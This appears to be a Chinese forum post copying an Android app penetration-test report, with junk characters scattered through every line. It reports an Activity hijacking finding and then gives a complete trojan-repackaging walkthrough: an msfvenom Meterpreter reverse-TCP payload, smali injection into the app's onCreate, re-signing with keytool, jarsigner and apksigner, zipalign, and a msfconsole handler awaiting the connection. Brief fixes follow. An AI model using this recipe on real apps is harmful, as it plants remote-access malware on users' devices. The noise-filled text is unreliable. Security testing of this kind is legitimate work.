7 {& j( U8 [( y% e, g( W 6 _% h, B; `4 W; `) k) W* m
0 P# F4 ^6 L; }/ U5 w# ]. s# ^/ L6 L$ g) P8 e

* o1 g" r8 T { . @0 D; f5 n8 x9 m   , B8 a& t9 z9 P$ e5 Y) I! F2 q, @ " W' r5 T# y( s6 X( L* w- R

+ K( J- d6 i0 P: v( S2 E( ] ! b. R& A9 b6 q5 @8 a0 t- Z& r- }1 D0 F

3 G- t# {: C. s" W6 T( S/ O' ]/ O: z4 G 1-2 测试结果 ( u3 b4 j. ?% }# s 6 s) R& S% G2 ?

" X6 H. ], I0 x6 v( C2 g/ b6 V- S( Z

. Y/ g# l' p2 w : f& f# O, Y& I6 v) P: ^7 Q   3 e4 R: }4 Z: w* O3 O + q0 d1 V& W8 ~6 q/ |

W! I- P- y$ X5 n6 z) f% i 7 w- s' ^4 a4 I4 y( M/ q

! r* o( U; O1 I 2 Q/ b8 S! E3 ~; \3 G& s; E" }9 @: O 2 检测结果                    & _& u" j+ u7 g F/ }; N! L& b9 F* o( [: P5 F3 Q

* E! q/ L2 M0 V: q$ i7 v& n* _7 P2 j 1 r2 c+ w1 Q3 f8 w( y1 m7 c b

. }% B3 Z, }( \9 M: v8 _- x1 ]' ? x% Y& ~4 W0 }9 T 2.1 某某某 0 T% K: m& f& R3 v; x) |# m' r( X6 P8 N% T3 D* X) Q- R( I0 n

3 o" z) }$ _+ A) v4 S' r ' P3 d& f/ e; a& V

3 Q" J7 O- f7 s- f- c( W 4 k0 c3 N3 r& t0 B: S1 { 2.1.1检测目标 " C- j: X: {! J* i/ ]) |. R' l T/ `' j' r# M% Y z7 K

% }# A; V2 n2 A$ r6 Q6 a* E1 u# @7 M" Q% A9 i0 F

% C+ I. n" x8 w) R & w7 z, P' O5 N 目标地址: 某某某某某某APP ! M% c2 x# f& h% Q5 O$ }" l v4 f8 e, U7 X) j$ C

4 z4 G( V" H; |6 I5 M* B7 a3 R( B) T7 }

0 v/ p1 l: a. p$ e 4 ]+ I" \+ X& f$ m3 M 2.1.2检测结果 4 t% q) U5 Y: M$ }0 s- k" x' z : s* J! n( J8 [2 Q

& y$ d/ K5 S$ n3 g8 e6 ?' W( p. L! R, I

9 p& d$ c& G7 z8 ?/ z/ d; L4 B 2 E* p7 ]6 \, r! p 2.1.2.1 4 R3 o8 O: P+ K2 g) ^/ b2 f - u% e5 ?6 J; i' D ?

2 @0 K+ Y/ S, I$ B: u# c) _3 X8 V- l* R$ F# | i+ V

4 e; J3 i. e1 A+ }: t3 W X g 9 W: Q+ R( Z8 h! r, l 漏洞链接地址:某某某某某某APP : r) u: V* i) @$ s( K5 h0 t# h, g: @8 h, Z

3 {5 T* v5 R$ d7 l" b2 | / B/ t7 o9 _5 }

) Z4 ?2 R5 k- g( D# M! j 0 S) Q ?9 ]" b6 J2 o; E* M; W   , W1 b9 G$ p& ^5 ?) k8 b ) o6 g) j6 P) W4 e6 ~

" j! M8 k k5 H* P ; N1 f& b0 |6 T- A2 ]3 h6 H

/ A' \4 l- u2 w: G 0 P3 {! n i6 N. U! K 漏洞分析及取证: 7 Q" l0 j Q4 f/ a9 g5 G& N: ~. j% L

% U( ]& M% K7 o# ] g2 d: { $ K. K3 y0 m; T! Y

8 F8 h& N3 b' C6 P/ H % s L# K6 k: K1 a) q5 ^                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: " B/ w9 S( T# ~! h& x$ x- h # x& k/ k, T$ {) X9 V; J: _

" n6 j7 ^% u. D; V6 t# @" Z8 m' r4 b/ x* W1 s) Z

9 z$ |4 K! j# }& n. m3 T( U: q6 p2 H. u( O. @ Z      $ ]6 n9 E% s+ J& k' k$ r* D0 O1 ?. |% Z

8 D* A% O6 I+ d4 [0 A- [' h8 v0 b , U6 E/ P8 M0 f8 F( W: s

7 Y/ b9 P6 l$ x6 T# A ; V" q0 [+ \8 s: z3 L' D2 W( x                       6 ~8 T: ]1 o$ a . w# C, {- @7 H; f0 t2 o8 b: B" y, k

1 c5 O/ i/ ]" ~- Z! a5 I8 y/ d' {8 B1 _

/ C2 a; o: W' N' m& {, d: ^. l( U( A5 s& Z2 U5 x, H 3 Q. a H. p. P4 h+ n1 h8 z; i) s( J: A+ @6 ^9 p, @) T( H8 i

7 Q' _# `& r' P2 a6 t$ M! G ) v/ n7 m& q' g9 K0 i

@4 l% j, t+ R1 }: R' ` F2 ~ c; V & x7 V; {7 B' T ( c9 q, [2 u2 z, V $ X6 a+ G# ]! b& j- }, r* b! ~

z" x O* t6 n; n5 z4 H J3 k/ {" `9 c8 b$ _

; n0 C+ k0 U8 z0 o y" m1 g ; h$ _; Z8 t6 o& j/ B8 Y: ~3 d& h2 F 9 y4 e6 B. N5 @9 z- H- S- H3 ]$ k4 O# B5 p* A3 \% s

# N; M. y; I2 i: ^% v3 [9 v' G* H( ?2 u

- e; ?& ^& s" {* [* B' T: @$ `" c: R9 L 漏洞危害:高 - {6 ~4 t& }% }7 |6 K3 K: o3 S ( M j2 S" d+ T+ z% ^

/ G' Y" x% s7 `5 n. ~ ) G/ B" h1 h- P M
4 G3 O1 ~2 @$ C5 k# l 6 X5 K4 y+ y) Z3 G * g$ ]$ M& v$ g/ k( k) e0 s( I: r$ C g0 {) p; a/ o9 z- K7 J: M6 l3 A9 ~9 ]" M% {! H$ I r/ Z! b i6 r6 l- @" X: p: e S3 V: ]5 {, g' o. S% @# d y3 D8 A+ O$ [. }- i' s: h: t3 B, o7 {; G9 n# D _3 U4 ~6 q1 z% s+ b0 i+ Y# f3 G% X$ G& ?6 f, H6 F) O+ }! \) f) a- F# y4 l- R1 Q( m# M' R# e r0 H: B% M% h" R9 D. f- ]2 n1 b, j3 o- s' D8 M% s% u; q4 _/ x9 D1 r# f* E4 `- _) _2 N4 w; C) @% r0 _, e2 A# d: s% _3 K" q+ ^- x; w/ }4 O+ ?" j# \; |, _7 A* ^* N' j- a+ f" P7 a" ^; Z4 A" b* w; X$ M" V: x$ U* j5 N- ?& a# D& P: A i9 P0 k$ n! k. G/ B& e% q {: }6 v, B% U( h1 M
; o( P. b; u# ^2 e3 z6 J ^# r 2 \) w) n& l- b$ |" x3 H2 t) |

5 e, R7 I9 |: A# Y3 Y: q) Q ) |9 ]- y2 q$ f7 u 严重程度 $ U4 q$ x' i$ U$ I8 ~ & [' a3 f+ |7 b* o- F

( r& ~% V+ }9 f5 m* @/ H0 L! ], m; {& L9 G2 G% I 		2 n. b- i& S7 p; c- i+ H2 y1 p! a) _ I/ q' s* {. B) C( z4 `

5 r7 f2 H" w$ H1 N7 t: T9 }* R5 f: e8 a 6 ]; V4 A' l: O; F. g p$ c* O4 E7 @6 u

3 P3 b. B4 k, g7 c7 v ?' t; D& Y: g' n' S 		, c% B9 {3 U( @ . V. E4 E! B' J$ Z2 N9 d6 |

8 w q3 A. }2 V( @2 K7 ?# y: a ( N. D0 s2 d5 n7 _ $ I8 J9 W& ]. X: [4 x$ W6 F8 C2 R * J' @1 H) a7 W ` W# f" \' r

1 o2 x S* F3 I2 `+ k 5 f; L8 U9 y M# `1 O# Z 		+ ^& a* c% O- i# A " r1 ?- S8 p: {2 Z) X# N

% M' p: U* _. f( z4 A6 M 9 o* N3 R) M# x' n& o F ; M7 A% j8 t9 n 4 F0 Y; ^, U$ b+ L( a

9 D) m7 u. w+ M% G/ n 8 F! J0 r) [& D' j+ ] f3 u- e 		+ e9 C9 R0 ~0 w8 M F( l7 ] 3 @" P" T) ^7 O* E4 ^% q+ f5 h$ @

" e" A- S8 L7 a0 \9 s5 h0 G1 I9 k$ C, K: _& h7 }   i; |2 \4 E1 k+ h$ w . g" b1 q: Q# A$ l

+ _# C7 e+ d7 \ : o, o9 a' l5 A: I D# W 		$ r+ g8 D1 e+ J! r" Q. X 7 s4 h, o5 C Y+ m5 F' g

% O( k+ m1 C }4 e, f ) q; `& b3 c; j 7 n( G8 D" ` `& g - A. D; j2 t* N& s% N

6 I- R8 T! m" {% _% w. F3 H* {, N5 @8 {; D% W 		4 a' t( Q+ U9 ?; S; i# K4 p + S8 N' i8 V g5 o7 V$ \9 g

$ k: U( ^: g& @; @# E! |; I, J' E4 o3 ?   8 l4 l/ R* O% c * t8 e$ z& L6 x" w4 ~

# k7 X1 U( W6 F ) s- I/ x i- m7 }5 X' M0 U: }% B
" Y" N; B; }3 F" z* X1 W, g Q% M0 | C' v8 B: C
( L6 A9 U4 u- X) F: Y * J" a; f! _1 L6 U% M

5 l1 z" g+ a/ E- R, K+ J9 g& ~; i8 N+ L7 X8 H9 M: p/ r   $ k& }4 F1 w0 }% ?# {) G0 o3 v 0 w+ F/ h, B7 F

; Q3 ^$ [2 r8 W* V& {9 P7 ] 6 B$ h2 ^& F0 [4 m0 b

) X# T. U* z0 X; p! r! C1 O! K& x7 J) R; D% L 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 2 [) _( P8 v% M9 V' r: P: R ( I/ D; X) v$ J( x! c m3 r# {4 l

: @% M. M. f# w - c6 p; K1 m# [4 [

9 C% { {7 R& H4 r; o( }$ [+ F4 a, N- K$ U' ~' \5 Y2 D, W" ? @           " `. R& a# K5 e- X1 M+ M7 l9 r( D

/ \7 F$ }8 L- c9 l : Q, h$ Z( v- x3 G! \6 b" S) _

& S9 }; \- a% E U8 E0 ^/ g3 U + A! _/ p3 }) r4 L: c   7 M. J& `! D6 Z( \: g2 l $ Q ]2 U2 B8 O% [* Z2 g

# t; q0 ~) J6 G! @ A ; O3 o9 H3 U$ C$ l+ L$ o2 h

' y* {" s1 P ?, P2 ?) P* Q7 Q 7 f: H G5 I) I- d! {9 d$ c 2.1.2.2 5 J) F" I+ r7 W" O3 q; k2 v+ H 7 F, J) u$ C$ R0 \7 H9 T

2 @, |" ~+ R, B3 O0 u 7 A/ r0 a [8 U1 I

6 h- M3 Z* R' B( B% m& K ( W4 y4 B [# r: C9 P8 {. f 漏洞链接地址:某某某某某某APP - R* @" E" q ^! d& f+ H- c+ E; M ( Z) n! t- X0 P @+ y T1 S

6 A: L- w _' x, j2 k9 @9 U) M 7 h5 A, `0 {5 q6 B

/ a8 ?4 ]6 W) w. K- H' n! V* _8 P# d1 I 漏洞分析及取证: 5 u) F' c9 y; @' i8 y* C% K# l5 F- O3 w0 L8 w% L" Q; r" S* @

! V4 D- p$ z- ]6 `- g% W % c. K: b3 s! H+ [( n* y

3 }( K) I P$ Z a 0 t$ [; t' }- k                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: L a9 S8 }- J 1 ~: c: D: S# K4 F5 I' T

$ x6 k5 O. o; V% H9 E) a0 A& s p3 V b p) j4 J0 s) q+ i; o5 W/ z! J

* ?, Z: N- k+ t9 c, Y 1 d4 Q# D" y% P9 k, B9 v' P Metasploit 生成木马 apk ! U# g9 ?, p2 W( m% |% s. @; u7 R/ {6 A3 y

) s+ u: Q6 n+ k. Q% U( T# ?4 o, e/ W4 J( `& L0 m3 D; ~/ _' T

' r3 m% T5 Q8 I ; N; y, a8 P2 Y6 R msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk $ w% z, e p; x) c' Y7 p9 L # `% Y) R* o) x+ c+ V

2 O1 |3 K8 V3 s; W 7 u- x1 s2 h/ O! ^0 B B$ X

1 X3 R: |2 r8 e/ g % m+ N7 G& z5 k3 K7 t 反编译目标apk和木马apk $ v7 \$ K( N8 K* ^& D5 @. \# V + U& V& d& I, q

2 c& D! N# ^6 ]9 L 6 N, \1 M7 K% X9 j

1 T# Z# D* f/ | E) h( e" U; i 1 D- b4 y0 s4 @) ?; [ apktool d target.apk
" Y8 g/ F0 V Y5 `. M' x5 S8 i7 Q9 F/ T4 ~2 F3 Y$ }+ o% z apktool d cockhorse.apk * J$ c% @8 c$ C2 d0 e : p7 ^6 Z6 ]2 d C" R

& M" J, u% s1 F4 a* t, A , Z+ V ~7 ]9 W$ ]* T

" L1 A% G' }/ e ! j" V, }# P |6 a) F 木马 apk 注入目标 apk - @) H. _' D* J. X 4 j1 M8 G+ i$ P

! l; L/ v/ k7 P 2 C+ b4 h/ l) P

# {3 w9 ?& J- `" {0 y2 J2 F : W! ]% ?1 A" L* H 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
4 L7 A }. M+ z, h 0 X9 I" f, N2 b5 z! g# F6 { invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V , W8 t. l, [! q4 @, J 0 Q& m9 f/ r1 f D/ |+ s& A- R

& o6 ^# K: r2 @. X ~5 l * L- ^% U Z5 {( R- x4 l

5 E4 M6 ?4 N: x+ N7 o4 K 5 g) t, o! [" h" \& @ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 : ?) G1 R7 i y3 j* @& k" ?0 e" V1 B5 ?

/ a8 q6 m6 c( S+ U* ?: ^; ]% A; ~: _- o0 ]8 C: Z5 Z2 Y! v

9 c) ]5 p1 c0 Z) z0 t0 Z j% X" t0 M& i 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ Y* o4 l. B" E5 X# {9 o/ V 0 m9 ?8 K" [: s' a+ O2 K

7 m9 }3 B A+ u) A' `, X' z: T 4 p: k6 _# N+ o

& ], C6 t- Z3 N5 h- L$ F2 r9 k 9 L' P% X4 ~* R& b 回编译生成最终 apk 7 N; r) _0 i8 R3 _) X! x+ C6 ` - q8 B0 E5 o; Q& y( A7 x4 K- h

5 g7 g6 k+ e* t6 g1 h9 U - i; B1 @0 Z% W# D! H

3 c' d9 e$ k, `' y7 k - [0 }" Q" L0 |& f W, B& S 重新打包 . b5 f# Q0 z. r 1 X- J% m) }3 ]4 W1 s2 z8 a

& ]5 j. V6 \3 s * W% t5 D$ e/ H5 E: Y4 v$ P

" d: d. a: b* a: n8 y! V: k) S& S3 v* l; O! w apktool b -o repackage.apk target_app_floder 5 X8 d) m$ L( [ 6 w" j% m2 Q, g1 b; A' v1 V

/ h2 G" e4 S8 l 1 F( Z8 e l& A

( C! H' T% w( N5 h, B$ q, A4 o, {! P/ t) \% k 创建签名文件,有的话可忽略此步骤 Z% I6 I' ]8 v. o. `' ~. k6 O- w / ?: i3 N, \6 F' F+ e" T: D

S/ f. a: ~8 n+ Y 8 m7 T) c7 h; G1 \: D2 r" }

# H4 W/ K/ _- j2 T8 g* F: _: w2 ? $ Q$ R5 O* z4 u, g keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                6 h: f* Y* ~5 w 8 {8 J" @6 F$ o# z$ Y

0 \ \+ i+ z6 o, Q7 _7 o6 {$ r/ Z5 K1 N

3 T1 `1 }3 o: } - q( \% G g Y" G, R& d 签名,以下任选其一 % N3 ^7 F; a: u7 A9 E 1 J6 W( ^! @) y/ {# ^

" g1 J: A* s* n8 n0 \, \* ~. y' X N* ?+ g4 U

$ c" Z* O9 _6 b/ ?1 O ! M! ]7 B3 ^& u6 v jarsigner 方式 0 @" A% d9 t/ x* ?: h: r! }7 s# D " f$ D) \, t: J2 C

, K1 r4 |1 ]3 B6 I# R* ]" \, S/ o) v/ J. h- u

" |6 a; @7 K7 M8 K- @& } + \* a8 ^/ C- X, q/ M jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 l" }9 \' z2 Z( J1 G K& h* M" I7 r7 ]! V8 ^/ E

1 b4 t' d1 l2 O2 I1 L+ r$ B7 j" ?+ W- g: j

! K, M' ^) ]: n3 b 4 l3 E7 T. x! v) o* f' H apksigner 方式 4 {+ a9 A% v' I2 r/ y/ x) {; f 0 ~: `& D2 h7 E8 y8 M& V

; G; {% a& v) D! @8 X6 y. q4 u4 G ) {* g3 W2 _! }$ i. D

$ u9 R* l+ _+ V; [, K( {- [5 _% k8 R1 Q9 r. V+ O7 U8 m. s( K2 x apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 F/ N2 {7 ^0 Z k# e: L4 o a0 a% o3 S% k( _" H5 ]6 W

" W/ {" v1 r8 p2 w' X* P + F9 h( y' f3 E* \% G8 t% }9 ~7 } t

) s$ W: P% S; g& Y - [. L; ^0 T% e7 ]9 @2 Q" u* Y; ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false # M/ V0 M9 F1 ^' ~3 ?0 V' q4 b) G" Q$ D6 l. K& O7 r

' @/ y. C8 _/ s) r; N9 M , N1 ^6 \5 @+ O# j% Y `, O

& |1 ]$ t9 L7 L6 }6 I / T4 u0 F' j9 ^; |6 u) N9 Z 验证,以下任选其一 + M6 m' _ x3 P; H1 o: z% ]0 I/ ~' j6 c( Q. F9 ^& Y

; @0 U! T. B ?, V0 K- R' | $ i2 l `) j9 }$ _0 A3 y* ?

- u7 o2 ^' i6 j5 c' t$ z1 M K8 J ) X. p' `5 n3 q jarsigner方式 3 S' U1 E3 L) Y3 z6 I* |; S2 x- \. q+ v( a

q: c' K! U' ^ / K' o2 x# P( S2 M3 Z

5 W; ^8 F( P" j5 k6 z; h8 j 7 l; k5 k7 ~0 q: P' @ jarsigner -verify repackaged.apk $ D% Y5 \, W" i/ l/ J( z: b! ?. U" c6 |2 G: R' A

3 H: x% B w! I- l5 b ^ . M4 a) j$ D: z

! W s/ y* r9 C0 N+ Z$ ~, F% i% U: ~- Q" t apksigner 方式 8 y7 p7 v/ ~, H, `" K5 k5 X$ d# \+ v+ H6 o4 }

N+ G) q$ n+ d6 B3 Q9 Z- I' o# V" m9 N& l% c

; s# i6 p/ `. i! S, S " a" h! Q9 }( v' f9 Z1 N) D8 u: | apksigner verify -v --print-certs repackaged.apk ~& D! T) y# \/ I+ C1 V$ U0 c & Q; @6 @$ t/ i0 i9 ]

, P8 w! M" B' D/ N / D& `- D. D! |

f5 G% s, v' K, ~3 ]' \& m6 H 6 `+ d: F7 N6 s+ u3 S7 \) h keytool方式 . A& o2 q2 o/ X8 n. ]$ [7 L- x& H/ j. e

/ a; O1 h8 y9 I8 F$ F 7 z% O% {% ?7 |) P

! j/ i0 Z q9 b. ~7 V6 Z! ?: @ 3 \8 L; F- \4 T1 D8 s keytool -printcert -jarfile repackaged.apk 0 s! q s. J0 y1 J. p- B- M ( \5 u4 G- g! h7 V

8 I' C1 v( Z% ? * l6 M t+ V" w. S

3 f0 E4 D: Y/ c p' Y ?/ J9 U0 U6 |1 p5 T' {7 F( w* ]. N, g0 q 对齐 * d4 M/ ~& u: u5 t: n8 T% B# ~5 q: a" G; `* v

9 u. h1 t$ i6 c) i8 o3 l# y9 k 6 o) U3 b$ e- W. j. D

# z9 ~! E5 A( L- E8 }' a- a $ Y' S8 z# q, [7 e" W7 C1 A 字节对齐优化 / p% i; N4 i& N' {8 }% W+ o% X+ A/ ^% n! M/ X

. M0 Y1 \- V3 n7 ]6 c+ m% k " T O. ]" w; {; T

! x9 P; K$ Q. a 0 J6 a# m. M( @. @ zipalign -v 4 repackaged.apk final.apk $ P# p+ X- |1 S/ W 8 |" z e1 K" K) o. ]7 U

* u0 K% T/ t3 s 0 [( U& ~* O2 ~; L* L

9 \. e u% j: Q7 Q+ r8 F ) l' ]6 ?6 U; _% S# M! k8 j 检查是否对齐 $ w9 R) m$ k% G# \1 L4 q8 J4 S- U# D: C

$ X) A/ L, f8 }" E; N3 A . j: @: b, q7 G& w

% Z/ T" h1 K" U/ K / l& x6 m- a1 j8 \" J zipalign -c -v 4 final.apk 1 [# x8 D( |2 q, e; o4 j& j4 ]( O; O% U1 v7 Q

) e, \* f9 L, a x: U8 t2 f3 O; j9 s1 Y7 P/ U2 U

/ w' S* s9 c! A' C3 ~. l" w- M' C0 v- p3 Y! T 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 : B. K" J9 G) W , k. O9 q/ ?+ m4 ~ E

4 R, f0 c; n$ N0 g9 x 6 X" V3 Z, B2 m$ k8 r6 q' p- L

( |4 }: L% Q5 s + D. F: O/ {3 @6 T# i1 x 启动Metasploit控制台,配置参数等待上线 6 B2 p! `& Q% M$ i' u* D) ~- c3 p9 d; B! O) G

2 r* J6 h% {% n: Y * [& b- n, \8 O3 h/ C' i' H, o

* o7 t4 P$ C" S. A5 Z; L; e: K" W9 a) t/ c- v5 L% m0 L 在终端依次输入如下命令 & O8 t4 Z/ H! E2 ^+ x! Z. r+ v R# e' @/ z

! ?( w4 C g0 e5 d- u " p% r* D' K) b* o0 m- {. @( L

& O b* z3 \7 }$ h+ Y* u 1 A3 h3 c9 M/ U/ |2 i msfconsole - P' r5 J2 ^+ Q$ A Q! _ 2 g- `) U" E- J

) G% Y- M$ S8 F% t" g : T. e; G a; D+ x5 M

/ `6 Q7 T. R7 K % M" s4 c$ H9 I2 X+ z& y( | use exploit/multi/handler 5 b) W- p9 e0 C; _2 m 1 b, B! _6 k( _- F6 c

0 c( ^ D( l# u2 O( A$ o# f# _# W, S- j2 q$ w, E

1 w4 k& }$ Y( _7 y+ Q5 c3 U ( x0 ?, O3 T& P set PAYLOAD android/meterpreter/reverse_tcp ; @2 O, |+ O5 C) n0 h [% A5 n+ |0 p+ u; }

0 _$ d8 \; d3 N& [- F, z4 E$ ?& A 8 j& ?& M" e. B: w/ ?* [ N

1 M; \1 j- ^1 j" Z" q5 o* ]5 ^, W$ i7 P4 _: e; X) T% D! \ set LHOST 192.xxx.xx.xx 4 d- s5 t( i3 [/ l. F" h; \, S / O# g+ ~2 U7 J! R! ]; R; g

! G! ]* T7 Q8 C1 x4 w5 a 5 q3 o" `* J: L* i

3 G5 y" t: ~6 [# J5 f 3 l0 A4 W) i) t' G3 p set LPORT 4444 : J7 O0 D" i1 @5 I* p9 y 2 I% w0 @1 M& W) D! m, T1 y

2 A6 x* Y# `4 O! h 9 U" z1 w% Q, F J# p- O. e; G# ^

1 Q% q. M5 e4 u' i! D# w5 p 1 j2 _6 A4 w2 @% `4 s5 a exploit % @8 v2 o( B% {* L; }( s ! R: f0 ?$ l' v- |

: u3 \7 ?& [( T! c$ i9 @0 L% t! s, A6 `. b+ @8 g

6 F5 S9 C O- g# E/ { ) g" i# w( H+ r0 }; N* s 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               5 ?* d# q3 D; O* F9 i6 m8 U T" ~ F5 R 4 I3 B: e( k5 D+ G" R4 }% r% } X/ A

, p, c1 |4 g9 { $ R, s# W; n; W R( P( Z7 L y( f" o

& o: } h2 A, | ) R( b% n9 \& C I8 I( P" H 漏洞危害:中 * v1 m, w- v2 j ! |2 R* G4 p( O. {- L7 r

* V. w3 l% J( S: u2 K/ c/ y / G) j! Y' ~" ^7 c
7 s; N: J" J, J0 `1 ]6 A3 v6 v9 N+ N8 w6 ?. f 8 f1 i' r* @6 ^; N% J+ C " n. v' E) x! ]% `2 M, N # x1 e0 i: }( ~! N3 C& u N* B8 [8 }% B! S) y7 z0 y8 F. s& u+ F& ^# h+ p, F) K3 n2 u( T3 O, k9 C! [5 Z+ K6 e7 l+ w0 v/ _+ e0 \/ B: B5 d) F; [9 f' `4 ~5 y2 c$ N% R0 n/ U5 J% ]) I0 t6 U) P6 x) F8 A, b$ j/ }" @8 h" o, W* N9 E. n5 J* ? W1 | b2 ^! E' v1 |7 f. [- y: c1 p9 L3 C: c! @ O; p9 ?- v; t- t$ h }# k s; F- T) T4 E8 I3 [' x2 T3 a9 h1 V+ ~7 t1 s/ z4 `4 N! O$ a. u% @* t5 h8 ^. G# s) m0 f7 y1 P4 a& Y% Z" k; |/ s- P! C% i$ |: ^- d9 I+ ~+ \( n% e' S: ^ ~1 O. d2 I" V6 W0 u. k; T0 m6 S3 f3 v( h& B0 A+ o' o$ N' @+ h5 G O" l2 @) O2 `& `1 V0 K# u2 g" u8 G: _ J# |0 `2 ?; R
9 c# s( W |, K' B0 D* j" O5 b# J6 S: J- i$ O: B

3 a) r$ q1 e& W/ U/ Q, s2 O- y+ K7 w4 q; O5 i 严重程度 A3 Z ]" e1 |; r \8 F; M 7 v( E5 d" \; d# h* B+ O! U

% B" X2 ^) Z1 R1 L* P3 y T. t3 n1 ]2 W% ~. y6 X: u, K) f 		/ L% |. c, u$ \5 U% }7 C 9 R6 b) m. {8 H% N

) ~+ s [' J- a; s7 N, C) B / s% }7 S8 [, v0 g7 \) H2 y1 F- Q; p 0 `+ A9 F& p, j- c8 S, ]! C; t% e

2 S3 P9 t1 r6 R& Y& F/ l7 w1 N3 J$ B5 ^ 		) H( ^) B \# K1 ^, C& r: \0 Q , |, b7 Z5 {) U5 ~

6 c/ ^6 E! J2 L4 @2 _( e" {8 a/ f' G3 C& W; P9 }% F 3 w2 c$ v8 [8 h) V3 c/ I# I7 W' A - H& x* T' y1 h; v* S

) a& r0 z H6 c* A. M/ n% Q- t% x7 {1 D8 |' j 		' k% _% C# q0 a( r% g* l/ D 8 F, T) O( O- \' F0 m# N

" O: I- |4 V6 Y : T7 U; ?( C: P' k7 v . p( }8 w# _# l ( u( u/ [9 M& `# K5 S! B: Z

4 J- U! v3 A. n; }8 z' ]7 \. e! I; I S; }) G. ] 		- e% j6 X+ i! `$ t! k |6 A5 D' ~5 f9 H# @/ F0 K* t6 q 3 y5 |; W5 m( P7 \( a" ?; p9 J7 e5 L) p6 e

: y# E! u! s9 F 9 e9 T+ U: ]; z+ ?% [   - }& }$ u" O1 E. [5 H2 W2 f" x# [% D& x

: N9 W! H& K" T 1 D& F' P, w0 _% G! |5 Q+ V 		, U8 ?/ l* b6 u4 H% o0 u( J8 {( W% t; V& p! o/ [: F

. n3 P8 o/ M) N; _ 1 r; i3 G1 o7 x7 r% k* M : V1 Q$ _& n6 e, R- ~ 9 M$ c5 d1 D" e) O. m

+ n- H- A! L. B% o+ M6 k$ W1 w' c. {" e* l+ r 		/ N( ]) J$ q3 J. }" m ! r. I% P3 h# E* ~) z# | 7 E* x& ] A# Q6 B, g5 K# A6 I p4 l) }/ P& X

; j, q: o& a! g1 R& B- E * z6 H5 B) V8 Y   0 o$ m% R2 W6 y - t/ k- y+ r( J. M. f' [# C

8 ]5 q+ B$ d% Z* k& Y# T! h) J * M2 Z2 z2 K. _; Z( r d
; I% h. u. a, }( N% g / t9 S% u' b. T2 U1 C
; k. a+ _/ p0 O! j. G ( \( N# y- t) S8 y3 C2 V

# G# H& f9 L T. W) C ; h5 W0 m6 t2 f% a s) w   & _ Y/ L5 H# ?. v! ? ; k0 d8 {9 D G

: I1 @- s7 Z8 X& c, }1 \ & q* W/ L7 w% Q! g# L7 {2 o

' J* ]# |. H1 D z$ p ) l0 ], ?6 z6 u 修复方法: # @1 u. @+ @8 N' L' W( f. I+ t5 G8 _. V9 L Z8 h0 C

4 ~. s' t, F- c' r/ X , Z, E$ j. ~1 y; {

3 B& Z1 o" Y0 ^6 i9 P! r) j 1 d4 s, ?8 u+ r H& [* n0 V               1. APP 启动时应做签名校验防止二次打包。
[( \; e! r4 D9 |& n5 y( V/ G) K7 [' V8 h: E1 l/ S8 u 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 1 C7 f: C1 J+ x6 k. [8 i 9 n8 }$ V1 d4 _1 Y

# U) n0 l y8 I3 |0 H 0 B" F2 C. V2 b8 E3 i 4 H) d4 o6 A8 M6 {% N( d + K: C( l: b; t6 G2 e

( w( k% T8 u3 V1 D) X9 U2 V0 ~4 H- I! s+ |   # U7 H) D% M3 e" }7 x [ I' \1 v/ ^3 c, {, n- B, D- c# w

0 Y' Z% T+ f" o ) |) z+ L+ G/ Z6 C$ D $ W2 y* ?1 K& q- r3 d5 b9 |8 ]- {6 R8 I, z& U) h/ ^# t( t

+ m6 K3 `6 i2 v" {; ] % V' c1 [' o8 h5 y3 b
) Q- y, C% s" I+ J, O8 Q . C# n2 V0 L. F* g2 Q( H3 V7 I% I

: _- u6 X( b+ j1 F! p" L9 ` ' K4 J, L4 e6 B1 c# @3 Z/ V
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表